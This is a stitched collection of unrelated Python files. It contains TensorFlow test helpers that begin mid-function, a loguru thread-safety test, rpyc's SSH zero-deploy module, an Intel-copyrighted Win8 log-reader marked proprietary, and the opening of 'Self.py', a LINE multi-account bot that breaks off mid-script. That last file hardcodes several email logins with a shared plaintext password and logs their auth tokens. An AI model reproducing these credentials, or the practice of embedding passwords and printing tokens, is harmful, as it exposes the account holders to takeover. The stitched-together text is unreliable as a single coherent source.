"""
if not self._tempdir:
self._tempdir = tempfile.mkdtemp(dir=googletest.GetTempDir())
return self._tempdir
def _AssertProtoEquals(self, a, b):
"""Asserts that a and b are the same proto.
Uses ProtoEq() first, as it returns correct results
for floating point attributes, and then use assertProtoEqual()
in case of failure as it provides good error messages.
Args:
a: a proto.
b: another proto.
"""
if not compare.ProtoEq(a, b):
compare.assertProtoEqual(self, a, b, normalize_numbers=True)
def assertProtoEquals(self, expected_message_maybe_ascii, message):
"""Asserts that message is same as parsed expected_message_ascii.
Creates another prototype of message, reads the ascii message into it and
then compares them using self._AssertProtoEqual().
Args:
expected_message_maybe_ascii: proto message in original or ascii form.
message: the message to validate.
"""
if isinstance(expected_message_maybe_ascii, type(message)):
expected_message = expected_message_maybe_ascii
self._AssertProtoEquals(expected_message, message)
elif isinstance(expected_message_maybe_ascii, str):
expected_message = type(message)()
text_format.Merge(expected_message_maybe_ascii, expected_message,
descriptor_pool=descriptor_pool.Default())
self._AssertProtoEquals(expected_message, message)
else:
assert False, ("Can't compare protos of type %s and %s" %
(type(expected_message_maybe_ascii), type(message)))
def assertProtoEqualsVersion(
self,
expected,
actual,
producer=versions.GRAPH_DEF_VERSION,
min_consumer=versions.GRAPH_DEF_VERSION_MIN_CONSUMER):
expected = "versions { producer: %d min_consumer: %d };\n%s" % (
producer, min_consumer, expected)
self.assertProtoEquals(expected, actual)
def assertStartsWith(self, actual, expected_start, msg=None):
"""Assert that actual.startswith(expected_start) is True.
Args:
actual: str
expected_start: str
msg: Optional message to report on failure.
"""
if not actual.startswith(expected_start):
fail_msg = "%r does not start with %r" % (actual, expected_start)
fail_msg += " : %r" % (msg) if msg else ""
self.fail(fail_msg)
def _eval_tensor(self, tensor):
if tensor is None:
return None
elif isinstance(tensor, ops.EagerTensor):
return tensor.numpy()
elif isinstance(tensor, resource_variable_ops.ResourceVariable):
return tensor.read_value().numpy()
elif callable(tensor):
return self._eval_helper(tensor())
else:
raise ValueError("Unsupported type %s." % type(tensor))
def _eval_helper(self, tensors):
if tensors is None:
return None
return nest.map_structure(self._eval_tensor, tensors)
def evaluate(self, tensors):
"""Evaluates tensors and returns numpy values.
Args:
tensors: A Tensor or a nested list/tuple of Tensors.
Returns:
tensors numpy values.
"""
if context.in_eager_mode():
return self._eval_helper(tensors)
else:
sess = ops.get_default_session()
if sess is None:
with self.test_session() as sess:
return sess.run(tensors)
else:
return sess.run(tensors)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def test_session(self,
graph=None,
config=None,
use_gpu=False,
force_gpu=False):
"""Returns a TensorFlow Session for use in executing tests.
This method should be used for all functional tests.
This method behaves differently from session.Session: for performance reasons
`test_session` will by default (if `graph` is None) reuse the same session
across tests. This means you may want to either call the function
`reset_default_graph()` before tests, or if creating an explicit new graph,
pass it here (simply setting it with `as_default()` won't do it), which will
trigger the creation of a new session.
Use the `use_gpu` and `force_gpu` options to control where ops are run. If
`force_gpu` is True, all ops are pinned to `/device:GPU:0`. Otherwise, if `use_gpu`
is True, TensorFlow tries to run as many ops on the GPU as possible. If both
`force_gpu` and `use_gpu` are False, all ops are pinned to the CPU.
Example:
```python
class MyOperatorTest(test_util.TensorFlowTestCase):
def testMyOperator(self):
with self.test_session(use_gpu=True):
valid_input = [1.0, 2.0, 3.0, 4.0, 5.0]
result = MyOperator(valid_input).eval()
self.assertEqual(result, [1.0, 2.0, 3.0, 5.0, 8.0])
invalid_input = [-1.0, 2.0, 7.0]
with self.assertRaisesOpError("negative input not supported"):
MyOperator(invalid_input).eval()
```
Args:
graph: Optional graph to use during the returned session.
config: An optional config_pb2.ConfigProto to use to configure the
session.
use_gpu: If True, attempt to run as many ops as possible on GPU.
force_gpu: If True, pin all ops to `/device:GPU:0`.
Returns:
A Session object that should be used as a context manager to surround
the graph building and execution code in a test case.
"""
if self.id().endswith(".test_session"):
self.skipTest("Not a test.")
def prepare_config(config):
"""Returns a config for sessions.
Args:
config: An optional config_pb2.ConfigProto to use to configure the
session.
Returns:
A config_pb2.ConfigProto object.
"""
if config is None:
config = config_pb2.ConfigProto()
config.allow_soft_placement = not force_gpu
config.gpu_options.per_process_gpu_memory_fraction = 0.3
elif force_gpu and config.allow_soft_placement:
config = config_pb2.ConfigProto().CopyFrom(config)
config.allow_soft_placement = False
# Don't perform optimizations for tests so we don't inadvertently run
# gpu ops on cpu
config.graph_options.optimizer_options.opt_level = -1
config.graph_options.rewrite_options.constant_folding = (
rewriter_config_pb2.RewriterConfig.OFF)
config.graph_options.rewrite_options.arithmetic_optimization = (
rewriter_config_pb2.RewriterConfig.OFF)
return config
if graph is None:
if self._cached_session is None:
self._cached_session = session.Session(
graph=None, config=prepare_config(config))
sess = self._cached_session
with sess.graph.as_default(), sess.as_default():
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
else:
with session.Session(graph=graph, config=prepare_config(config)) as sess:
if force_gpu:
# Use the name of an actual device if one is detected, or '/device:GPU:0'
# otherwise
gpu_name = gpu_device_name()
if not gpu_name:
gpu_name = "/device:GPU:0"
with sess.graph.device(gpu_name):
yield sess
elif use_gpu:
yield sess
else:
with sess.graph.device("/cpu:0"):
yield sess
# pylint: enable=g-doc-return-or-yield
class _CheckedThread(object):
"""A wrapper class for Thread that asserts successful completion.
This class should be created using the TensorFlowTestCase.checkedThread()
method.
"""
def __init__(self, testcase, target, args=None, kwargs=None):
"""Constructs a new instance of _CheckedThread.
Args:
testcase: The TensorFlowTestCase for which this thread is being created.
target: A callable object representing the code to be executed in the
thread.
args: A tuple of positional arguments that will be passed to target.
kwargs: A dictionary of keyword arguments that will be passed to target.
"""
self._testcase = testcase
self._target = target
self._args = () if args is None else args
self._kwargs = {} if kwargs is None else kwargs
self._thread = threading.Thread(target=self._protected_run)
self._exception = None
self._is_thread_joined = False
def _protected_run(self):
"""Target for the wrapper thread. Sets self._exception on failure."""
try:
self._target(*self._args, **self._kwargs)
except Exception as e: # pylint: disable=broad-except
self._exception = e
def start(self):
"""Starts the thread's activity.
This must be called at most once per _CheckedThread object. It arranges
for the object's target to be invoked in a separate thread of control.
"""
self._thread.start()
def join(self):
"""Blocks until the thread terminates.
Raises:
self._testcase.failureException: If the thread terminates due to
an exception.
"""
self._is_thread_joined = True
self._thread.join()
if self._exception is not None:
self._testcase.fail("Error in checkedThread: %s" % str(self._exception))
def is_alive(self):
"""Returns whether the thread is alive.
This method returns True just before the run() method starts
until just after the run() method terminates.
Returns:
True if the thread is alive, otherwise False.
"""
return self._thread.is_alive()
def check_termination(self):
"""Returns whether the checked thread was properly used and did terminate.
Every checked thread should be "join"ed after starting, and before the
test tears down. If it is not joined, it is possible the thread will hang
and cause flaky failures in tests.
Raises:
self._testcase.failureException: If check_termination was called before
thread was joined.
RuntimeError: If the thread is not terminated. This means thread was not
joined with the main thread.
"""
if self._is_thread_joined:
if self.is_alive():
raise RuntimeError(
"Thread was not joined with main thread, and is still running "
"when the test finished.")
else:
self._testcase.fail("A checked thread was not joined.")
def checkedThread(self, target, args=None, kwargs=None):
"""Returns a Thread wrapper that asserts 'target' completes successfully.
This method should be used to create all threads in test cases, as
otherwise there is a risk that a thread will silently fail, and/or
assertions made in the thread will not be respected.
Args:
target: A callable object to be executed in the thread.
args: The argument tuple for the target invocation. Defaults to ().
kwargs: A dictionary of keyword arguments for the target invocation.
Defaults to {}.
Returns:
A wrapper for threading.Thread that supports start() and join() methods.
"""
ret = TensorFlowTestCase._CheckedThread(self, target, args, kwargs)
self._threads.append(ret)
return ret
# pylint: enable=invalid-name
def assertNear(self, f1, f2, err, msg=None):
"""Asserts that two floats are near each other.
Checks that |f1 - f2| < err and asserts a test failure
if not.
Args:
f1: A float value.
f2: A float value.
err: A float value.
msg: An optional string message to append to the failure message.
"""
# f1 == f2 is needed here as we might have: f1, f2 = inf, inf
self.assertTrue(f1 == f2 or math.fabs(f1 - f2) <= err,
"%f != %f +/- %f%s" % (f1, f2, err, " (%s)" % msg
if msg is not None else ""))
def assertArrayNear(self, farray1, farray2, err):
"""Asserts that two float arrays are near each other.
Checks that for all elements of farray1 and farray2
|f1 - f2| < err. Asserts a test failure if not.
Args:
farray1: a list of float values.
farray2: a list of float values.
err: a float value.
"""
self.assertEqual(len(farray1), len(farray2))
for f1, f2 in zip(farray1, farray2):
self.assertNear(float(f1), float(f2), err)
def _NDArrayNear(self, ndarray1, ndarray2, err):
return np.linalg.norm(ndarray1 - ndarray2) < err
def assertNDArrayNear(self, ndarray1, ndarray2, err):
"""Asserts that two numpy arrays have near values.
Args:
ndarray1: a numpy ndarray.
ndarray2: a numpy ndarray.
err: a float. The maximum absolute difference allowed.
"""
self.assertTrue(self._NDArrayNear(ndarray1, ndarray2, err))
def _GetNdArray(self, a):
if not isinstance(a, np.ndarray):
a = np.array(a)
return a
def _assertArrayLikeAllClose(self, a, b, rtol=1e-6, atol=1e-6, msg=None):
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
if not np.allclose(a, b, rtol=rtol, atol=atol):
# Prints more details than np.testing.assert_allclose.
#
# NOTE: numpy.allclose (and numpy.testing.assert_allclose)
# checks whether two arrays are element-wise equal within a
# tolerance. The relative difference (rtol * abs(b)) and the
# absolute difference atol are added together to compare against
# the absolute difference between a and b. Here, we want to
# print out which elements violate such conditions.
cond = np.logical_or(
np.abs(a - b) > atol + rtol * np.abs(b), np.isnan(a) != np.isnan(b))
if a.ndim:
x = a[np.where(cond)]
y = b[np.where(cond)]
print("not close where = ", np.where(cond))
else:
# np.where is broken for scalars
x, y = a, b
print("not close lhs = ", x)
print("not close rhs = ", y)
print("not close dif = ", np.abs(x - y))
print("not close tol = ", atol + rtol * np.abs(y))
print("dtype = %s, shape = %s" % (a.dtype, a.shape))
np.testing.assert_allclose(a, b, rtol=rtol, atol=atol, err_msg=msg)
def assertAllClose(self, a, b, rtol=1e-6, atol=1e-6):
"""Asserts that two numpy arrays, or dicts of same, have near values.
This does not support nested dicts. `a` and `b` can be namedtuples too,
which are converted to dicts.
Args:
a: The expected numpy ndarray (or anything that can be converted to one), or
dict of same. Must be a dict iff `b` is a dict.
b: The actual numpy ndarray (or anything that can be converted to one), or
dict of same. Must be a dict iff `a` is a dict.
rtol: relative tolerance.
atol: absolute tolerance.
Raises:
ValueError: if only one of `a` and `b` is a dict.
"""
# Check if a and/or b are namedtuples.
if hasattr(a, "_asdict"):
a = a._asdict()
if hasattr(b, "_asdict"):
b = b._asdict()
is_a_dict = isinstance(a, dict)
if is_a_dict != isinstance(b, dict):
raise ValueError("Can't compare dict to non-dict, %s vs %s." % (a, b))
if is_a_dict:
self.assertItemsEqual(
a.keys(), b.keys(),
msg="mismatched keys, expected %s, got %s" % (a.keys(), b.keys()))
for k in a:
self._assertArrayLikeAllClose(
a[k], b[k], rtol=rtol, atol=atol,
msg="%s: expected %s, got %s." % (k, a, b))
else:
self._assertArrayLikeAllClose(a, b, rtol=rtol, atol=atol)
def assertAllCloseAccordingToType(self,
a,
b,
rtol=1e-6,
atol=1e-6,
float_rtol=1e-6,
float_atol=1e-6,
half_rtol=1e-3,
half_atol=1e-3,
bfloat16_rtol=1e-2,
bfloat16_atol=1e-2):
"""Like assertAllClose, but also suitable for comparing fp16 arrays.
In particular, the tolerance is reduced to 1e-3 if at least
one of the arguments is of type float16.
Args:
a: the expected numpy ndarray or anything that can be converted to one.
b: the actual numpy ndarray or anything that can be converted to one.
rtol: relative tolerance.
atol: absolute tolerance.
float_rtol: relative tolerance for float32.
float_atol: absolute tolerance for float32.
half_rtol: relative tolerance for float16.
half_atol: absolute tolerance for float16.
bfloat16_rtol: relative tolerance for bfloat16.
bfloat16_atol: absolute tolerance for bfloat16.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
# types with lower tol are put later to overwrite previous ones.
if (a.dtype == np.float32 or b.dtype == np.float32 or
a.dtype == np.complex64 or b.dtype == np.complex64):
rtol = max(rtol, float_rtol)
atol = max(atol, float_atol)
if a.dtype == np.float16 or b.dtype == np.float16:
rtol = max(rtol, half_rtol)
atol = max(atol, half_atol)
if (a.dtype == dtypes.bfloat16.as_numpy_dtype or
b.dtype == dtypes.bfloat16.as_numpy_dtype):
rtol = max(rtol, bfloat16_rtol)
atol = max(atol, bfloat16_atol)
self.assertAllClose(a, b, rtol=rtol, atol=atol)
def assertAllEqual(self, a, b):
"""Asserts that two numpy arrays have the same values.
Args:
a: the expected numpy ndarray or anything that can be converted to one.
b: the actual numpy ndarray or anything that can be converted to one.
"""
a = self._GetNdArray(a)
b = self._GetNdArray(b)
self.assertEqual(a.shape, b.shape, "Shape mismatch: expected %s, got %s." %
(a.shape, b.shape))
same = (a == b)
if a.dtype == np.float32 or a.dtype == np.float64:
same = np.logical_or(same, np.logical_and(np.isnan(a), np.isnan(b)))
if not np.all(same):
# Prints more details than np.testing.assert_array_equal.
diff = np.logical_not(same)
if a.ndim:
x = a[np.where(diff)]
y = b[np.where(diff)]
print("not equal where = ", np.where(diff))
else:
# np.where is broken for scalars
x, y = a, b
print("not equal lhs = ", x)
print("not equal rhs = ", y)
np.testing.assert_array_equal(a, b)
# pylint: disable=g-doc-return-or-yield
@contextlib.contextmanager
def assertRaisesWithPredicateMatch(self, exception_type,
expected_err_re_or_predicate):
"""Returns a context manager to enclose code expected to raise an exception.
If the exception is an OpError, the op stack is also included in the message
predicate search.
Args:
exception_type: The expected type of exception that should be raised.
expected_err_re_or_predicate: If this is callable, it should be a function
of one argument that inspects the passed-in exception and
returns True (success) or False (please fail the test). Otherwise, the
error message is expected to match this regular expression partially.
Returns:
A context manager to surround code that is expected to raise an
exception.
"""
if callable(expected_err_re_or_predicate):
predicate = expected_err_re_or_predicate
else:
def predicate(e):
err_str = e.message if isinstance(e, errors.OpError) else str(e)
op = e.op if isinstance(e, errors.OpError) else None
while op is not None:
err_str += "\nCaused by: " + op.name
op = op._original_op # pylint: disable=protected-access
logging.info("Searching within error strings: '%s' within '%s'",
expected_err_re_or_predicate, err_str)
return re.search(expected_err_re_or_predicate, err_str)
try:
yield
self.fail(exception_type.__name__ + " not raised")
except Exception as e: # pylint: disable=broad-except
if not isinstance(e, exception_type) or not predicate(e):
raise AssertionError("Exception of type %s: %s" % (str(type(e)),
str(e)))
# pylint: enable=g-doc-return-or-yield
def assertRaisesOpError(self, expected_err_re_or_predicate):
return self.assertRaisesWithPredicateMatch(errors.OpError,
expected_err_re_or_predicate)
def assertShapeEqual(self, np_array, tf_tensor):
"""Asserts that a Numpy ndarray and a TensorFlow tensor have the same shape.
Args:
np_array: A Numpy ndarray or Numpy scalar.
tf_tensor: A Tensor.
Raises:
TypeError: If the arguments have the wrong type.
"""
if not isinstance(np_array, (np.ndarray, np.generic)):
raise TypeError("np_array must be a Numpy ndarray or Numpy scalar")
if not isinstance(tf_tensor, ops.Tensor):
raise TypeError("tf_tensor must be a Tensor")
self.assertAllEqual(np_array.shape, tf_tensor.get_shape().as_list())
def assertDeviceEqual(self, device1, device2):
"""Asserts that the two given devices are the same.
Args:
device1: A string device name or TensorFlow `DeviceSpec` object.
device2: A string device name or TensorFlow `DeviceSpec` object.
"""
device1 = pydev.canonical_name(device1)
device2 = pydev.canonical_name(device2)
self.assertEqual(device1, device2,
"Devices %s and %s are not equal" % (device1, device2))
# Fix Python 3 compatibility issues
if six.PY3:
# pylint: disable=invalid-name
# Silence a deprecation warning
assertRaisesRegexp = googletest.TestCase.assertRaisesRegex
# assertItemsEqual is assertCountEqual as of 3.2.
assertItemsEqual = googletest.TestCase.assertCountEqual
# pylint: enable=invalid-name
def create_local_cluster(num_workers, num_ps, protocol="grpc",
worker_config=None, ps_config=None):
"""Create and start local servers and return the associated `Server` objects.
Example:
```python
workers, _ = tf.test.create_local_cluster(num_workers=2, num_ps=2)
worker_sessions = [tf.Session(w.target) for w in workers]
with tf.device("/job:ps/task:0"):
...
with tf.device("/job:ps/task:1"):
...
with tf.device("/job:worker/task:0"):
...
with tf.device("/job:worker/task:1"):
...
worker_sessions[0].run(...)
```
Args:
num_workers: Number of worker servers to start.
num_ps: Number of PS servers to start.
protocol: Communication protocol. Allowed values are documented in
the documentation of `tf.train.Server`.
worker_config: (optional) ConfigProto to initialize workers. Can be used
to instantiate multiple devices etc.
ps_config: (optional) ConfigProto to initialize PS servers.
Returns:
A tuple `(worker_servers, ps_servers)`. `worker_servers` is a list
of `num_workers` objects of type `tf.train.Server` (all running locally);
and `ps_servers` is a list of `num_ps` objects of similar type.
Raises:
ImportError: if portpicker module was not found at load time
"""
if _portpicker_import_error:
raise _portpicker_import_error # pylint: disable=raising-bad-type
worker_ports = [portpicker.pick_unused_port() for _ in range(num_workers)]
ps_ports = [portpicker.pick_unused_port() for _ in range(num_ps)]
cluster_dict = {
"worker": ["localhost:%s" % port for port in worker_ports],
"ps": ["localhost:%s" % port for port in ps_ports]
}
cs = server_lib.ClusterSpec(cluster_dict)
workers = [
server_lib.Server(
cs, job_name="worker", protocol=protocol, task_index=ix,
config=worker_config, start=True)
for ix in range(num_workers)
]
ps_servers = [
server_lib.Server(
cs, job_name="ps", protocol=protocol, task_index=ix,
config=ps_config, start=True)
for ix in range(num_ps)
]
return workers, ps_servers
def get_node_def_from_graph(node_name, graph_def):
"""Returns the `NodeDef` instance for given node name in the graph def.
This method explores only the NodeDefs in `graph_def.node`.
Args:
node_name: Name of the NodeDef to search for.
graph_def: An instance of `GraphDef` proto.
Returns:
the `NodeDef` instance whose name field matches the given node_name, or None if no such node exists.
"""
for node_def in graph_def.node:
if node_def.name == node_name:
return node_def
return None
|
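The `_CheckedThread` helper above exists so that an assertion failure inside a worker thread cannot pass silently: the exception is caught in `_protected_run` and turned into a test failure when `join()` is called. A stand-alone sketch of the same idea, usable without TensorFlow (the class and names here are hypothetical):

```python
import threading

class CheckedThread:
    """Store any exception raised by the target and re-raise it on join()."""

    def __init__(self, target, args=(), kwargs=None):
        self._target, self._args, self._kwargs = target, args, kwargs or {}
        self._exc = None
        self._thread = threading.Thread(target=self._run)

    def _run(self):
        try:
            self._target(*self._args, **self._kwargs)
        except Exception as e:  # deliberately broad, mirroring _protected_run
            self._exc = e

    def start(self):
        self._thread.start()

    def join(self):
        self._thread.join()
        if self._exc is not None:
            raise self._exc

if __name__ == "__main__":
    t = CheckedThread(target=lambda: 1 / 0)
    t.start()
    try:
        t.join()
    except ZeroDivisionError:
        print("worker failure surfaced on join()")
```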
test_threading.py
|
from threading import Thread
from loguru import logger
import time
def test_safe(capsys):
    first_thread_initialized = False
    second_thread_initialized = False
    entered = False
    output = ""

    def non_safe_sink(msg):
        nonlocal entered
        nonlocal output
        assert not entered
        entered = True
        time.sleep(1)
        entered = False
        output += msg

    def first_thread():
        nonlocal first_thread_initialized
        first_thread_initialized = True
        time.sleep(1)
        assert second_thread_initialized
        logger.debug("message 1")

    def second_thread():
        nonlocal second_thread_initialized
        second_thread_initialized = True
        time.sleep(1)
        assert first_thread_initialized
        time.sleep(0.5)
        logger.debug("message 2")

    logger.add(non_safe_sink, format="{message}", catch=False)

    threads = [Thread(target=first_thread), Thread(target=second_thread)]

    for thread in threads:
        thread.start()

    for thread in threads:
        thread.join()

    out, err = capsys.readouterr()
    assert out == err == ""
    assert output == "message 1\nmessage 2\n"
|
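The test above relies on loguru serializing calls into a sink: `non_safe_sink` asserts it is never entered by two threads at once, and the messages still come out in order. If you need that guarantee for an arbitrary callable yourself, a small lock wrapper is the usual approach; a hedged sketch (plain threading, not loguru API):

```python
import threading

def serialized(write):
    """Wrap a non-thread-safe writer so that at most one thread is inside it
    at a time, which is the property test_safe asserts for loguru sinks."""
    lock = threading.Lock()

    def sink(message):
        with lock:
            write(message)

    return sink

# Usage sketch: logger.add(serialized(some_fragile_writer), format="{message}")
```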
zerodeploy.py
|
"""
.. versionadded:: 3.3
Requires [plumbum](http://plumbum.readthedocs.org/)
"""
from __future__ import with_statement
import rpyc
import socket
from rpyc.core.service import VoidService
try:
from plumbum import local, ProcessExecutionError
from plumbum.utils import copy
except ImportError:
import inspect
if any("sphinx" in line[1] or "docutils" in line[1] or "autodoc" in line[1] for line in inspect.stack()):
# let the sphinx docs be built without requiring plumbum installed
pass
else:
raise
SERVER_SCRIPT = r"""\
import sys
import os
import atexit
import shutil
from threading import Thread
here = os.path.dirname(__file__)
os.chdir(here)
def rmdir():
shutil.rmtree(here, ignore_errors = True)
atexit.register(rmdir)
sys.path.insert(0, os.getcwd())
from rpyc.utils.server import $SERVER$ as ServerCls
from rpyc import SlaveService
t = ServerCls(SlaveService, hostname = "localhost", port = 0, reuse_addr = True)
sys.stdout.write("%s\n" % (t.port,))
sys.stdout.flush()
try:
thd = Thread(target = t.start)
thd.setDaemon(True)
thd.start()
sys.stdin.read()
finally:
t.close()
thd.join(2)
"""
class DeployedServer(object):
"""
Sets up a temporary, short-lived RPyC deployment on the given remote machine. It will:
1. Create a temporary directory on the remote machine and copy RPyC's code
from the local machine to the remote temporary directory.
2. Start an RPyC server on the remote machine, binding to an arbitrary TCP port,
allowing only in-bound connections (``localhost`` connections). The server reports the
chosen port over ``stdout``.
3. An SSH tunnel is created from an arbitrary local port (on the local host), to the remote
machine's chosen port. This tunnel is authenticated and encrypted.
4. You get a ``DeployedServer`` object that can be used to connect to the newly-spawned server.
5. When the deployment is closed, the SSH tunnel is torn down, the remote server terminates
and the temporary directory is deleted.
:param remote_machine: a ``plumbum.SshMachine`` instance, representing an SSH
connection to the desired remote machine
:param server_class: the server to create (e.g., ``"ThreadedServer"``, ``"ForkingServer"``)
"""
def __init__(self, remote_machine, server_class = "ThreadedServer"):
self.proc = None
self.tun = None
self._tmpdir_ctx = None
rpyc_root = local.path(rpyc.__file__).dirname
self._tmpdir_ctx = remote_machine.tempdir()
tmp = self._tmpdir_ctx.__enter__()
copy(rpyc_root, tmp)
script = (tmp / "deployed-rpyc.py")
script.write(SERVER_SCRIPT.replace("$SERVER$", server_class))
self.proc = remote_machine.python.popen(script, new_session = True)
line = ""
try:
line = self.proc.stdout.readline()
remote_port = int(line.strip())
except Exception:
try:
self.proc.terminate()
except Exception:
pass
stdout, stderr = self.proc.communicate()
raise ProcessExecutionError(self.proc.argv, self.proc.returncode, line + stdout, stderr)
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(("localhost", 0))
self.local_port = s.getsockname()[1]
s.close()
self.tun = remote_machine.tunnel(self.local_port, remote_port)
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, t, v, tb):
self.close()
def close(self):
if self.proc is not None:
try:
self.proc.terminate()
except Exception:
pass
self.proc = None
if self.tun is not None:
self.tun.close()
self.tun = None
if self._tmpdir_ctx is not None:
self._tmpdir_ctx.__exit__(None, None, None)
self._tmpdir_ctx = None
def connect(self, service = VoidService, config = {}):
"""Same as :func:`connect <rpyc.utils.factory.connect>`, but with the ``host`` and ``port``
parameters fixed"""
return rpyc.connect("localhost", self.local_port, service = service, config = config)
def classic_connect(self):
"""Same as :func:`classic.connect <rpyc.utils.classic.connect>`, but with the ``host`` and
``port`` parameters fixed"""
return rpyc.classic.connect("localhost", self.local_port)
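# Hedged usage sketch (the host name is an assumption, not taken from this
# module): deploy to an SshMachine, connect classically, and let the
# with-block tear down the tunnel, the remote process and the temp directory.
#
#   from plumbum import SshMachine
#   mach = SshMachine("somehost")
#   with DeployedServer(mach) as dep:
#       conn = dep.classic_connect()
#       print(conn.modules.sys.platform)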
class MultiServerDeployment(object):
"""
An 'aggregate' server deployment to multiple SSH machines. It deploys RPyC to each machine
separately, but lets you manage them as a single deployment.
"""
def __init__(self, remote_machines, server_class = "ThreadedServer"):
self.remote_machines = remote_machines
# build the list incrementally, so we can clean it up if we have an exception
self.servers = [DeployedServer(mach, server_class) for mach in remote_machines]
def __del__(self):
self.close()
def __enter__(self):
return self
def __exit__(self, t, v, tb):
self.close()
def __iter__(self):
return iter(self.servers)
def __len__(self):
return len(self.servers)
def __getitem__(self, index):
return self.servers[index]
def close(self):
while self.servers:
s = self.servers.pop(0)
s.close()
def connect_all(self, service = VoidService, config = {}):
"""connects to all deployed servers; returns a list of connections (order guaranteed)"""
return [s.connect(service, config) for s in self.servers]
def classic_connect_all(self):
"""connects to all deployed servers using classic_connect; returns a list of connections (order guaranteed)"""
return [s.classic_connect() for s in self.servers]
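# Hedged usage sketch for MultiServerDeployment (host names are assumptions):
#
#   machines = [SshMachine("host1"), SshMachine("host2")]
#   with MultiServerDeployment(machines) as dep:
#       conn1, conn2 = dep.connect_all()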
|
Win8ReaderThread.py
|
"""
:copyright: (c)Copyright 2013, Intel Corporation All Rights Reserved.
The source code contained or described here in and all documents related
to the source code ("Material") are owned by Intel Corporation or its
suppliers or licensors. Title to the Material remains with Intel Corporation
or its suppliers and licensors. The Material contains trade secrets and
proprietary and confidential information of Intel or its suppliers and
licensors.
The Material is protected by worldwide copyright and trade secret laws and
treaty provisions. No part of the Material may be used, copied, reproduced,
modified, published, uploaded, posted, transmitted, distributed, or disclosed
in any way without Intel's prior express written permission.
No license under any patent, copyright, trade secret or other intellectual
property right is granted to or conferred upon you by disclosure or delivery
of the Materials, either expressly, by implication, inducement, estoppel or
otherwise. Any license under such intellectual property rights must be express
and approved by Intel in writing.
:organization: INTEL MCG PSI
:summary: This file implements the Win8 logger reader thread
:since: 22/02/2012
:author: rbertolini
"""
import threading
import socket
from Win8WriterThread import Win8WriterThread
class Win8ReaderThread(object):
"""
Class describing the thread used to read logs sent by the Win8 DUT.
"""
__SOCKET_TIMEOUT = 5.0
"""
Socket timeout used when reading data from the socket.
"""
def __init__(self, device_ip, port_number):
"""
Constructor of Win8ReaderThread
:type device_ip: string
:param device_ip: Ip address of the targeted device
:type port_number: int
:param port_number: Port where the logger (running on the device) is
listening for connections
"""
# initialization of the variables.
self.__ip_address = device_ip
self.__port = port_number
self.__reader_thread = None
self.__socket = None
self.__thread_alive = threading.Event()
self.__thread_alive.set()
# Creating a Win8WriterThread.
self.__writer_thread = Win8WriterThread()
def start(self):
"""
Starts the Reader and Writer threads.
Connects to the logger.
And then starts listening to the logger.
"""
self.__writer_thread.start()
self.__reader_thread = threading.Thread(target=self.__run)
self.__reader_thread.name = "Win8ReaderThread"
self._connect()
self.__reader_thread.start()
def set_output_path(self, output_path):
"""
Set stdout file path
:type output_path: string
:param output_path: path of the log file to be created
"""
self.__writer_thread.set_output_path(output_path)
return
def stop(self):
"""
Disconnect the thread from the socket of the DUT logger.
"""
try:
self._disconnect()
except Exception as ex: # pylint: disable=W0703
print "Error: %s" % str(ex)
def _connect(self):
"""
Opens the connection with the logger.
"""
self.__socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.__socket.settimeout(self.__SOCKET_TIMEOUT)
print "Trying to Connect..."
self.__socket.connect((self.__ip_address, self.__port))
print "Connected"
def _disconnect(self):
"""
Closes the connection with the logger.
"""
# close gently the reader thread
if self.__reader_thread.is_alive():
self.__thread_alive.clear()
self.__reader_thread.join(5)
self.__socket.shutdown(socket.SHUT_RDWR)
self.__socket.close()
self.__socket = None
# close gently the writer thread
self.__writer_thread.stop()
def __run(self):
while self.__thread_alive.isSet():
# Read the socket
try:
data = self.__socket.recv(8192)
if data is not None:
self.__writer_thread.push(data)
except socket.timeout:
# no data has been received from the socket
pass
# -----------------------------------------------------------------------------
if __name__ == "__main__":
log_reader = Win8ReaderThread("127.0.0.1", 8003)
log_reader.start()
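# Hedged continuation of the example above (the file name is an assumption):
# route the received log stream to a file, then stop the reader when done.
#   log_reader.set_output_path("win8_device.log")
#   # ... let the device stream logs for a while ...
#   log_reader.stop()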
|
Self.py
|
import KIA
from KIA import *
from akad.ttypes import *
from multiprocessing import Pool, Process
from time import sleep
import pytz, datetime, pafy, time, timeit, random, sys, ast, re, os, json, subprocess, threading, string, codecs, requests, tweepy, ctypes, urllib, wikipedia
from datetime import timedelta, date
from datetime import datetime
from bs4 import BeautifulSoup
from googletrans import Translator
import youtube_dl
#=============
cl = LineClient("bardiansyah93@gmail.com","sbardian71993")
cl.log("Auth Token : " + str(cl.authToken))
channel = LineChannel(cl)
cl.log("Channel Access Token : " + str(channel.channelAccessToken))
lineProfile = cl.getProfile()
lineSettings = cl.getSettings()
mid = cl.getProfile().mid
responsename1 = cl.getProfile().displayName
ki = LineClient("sbardian7@gmail.com","sbardian71993")
ki.log("Auth Token : " + str(ki.authToken))
channel1 = LineChannel(ki)
ki.log("Channel Access Token : " + str(channel1.channelAccessToken))
lineProfile = ki.getProfile()
lineSettings = ki.getSettings()
Amid = ki.getProfile().mid
responsename2 = ki.getProfile().displayName
kk = LineClient("pekonpelitajaya@gmail.com","sbardian71993")
kk.log("Auth Token : " + str(kk.authToken))
channel2 = LineChannel(kk)
kk.log("Channel Access Token : " + str(channel2.channelAccessToken))
lineProfile = kk.getProfile()
lineSettings = kk.getSettings()
Bmid = kk.getProfile().mid
responsename3 = kk.getProfile().displayName
kc = LineClient("syahbardian3@gmail.com","sbardian71993")
kc.log("Auth Token : " + str(kc.authToken))
channel3 = LineChannel(kc)
kc.log("Channel Access Token : " + str(channel3.channelAccessToken))
lineProfile = kc.getProfile()
lineSettings = kc.getSettings()
Cmid = kc.getProfile().mid
responsename4 = kc.getProfile().displayName
km = LineClient("syahbardian2@gmail.com","sbardian71993")
km.log("Auth Token : " + str(km.authToken))
channel4 = LineChannel(km)
km.log("Channel Access Token : " + str(channel4.channelAccessToken))
lineProfile = km.getProfile()
lineSettings = km.getSettings()
Dmid = km.getProfile().mid
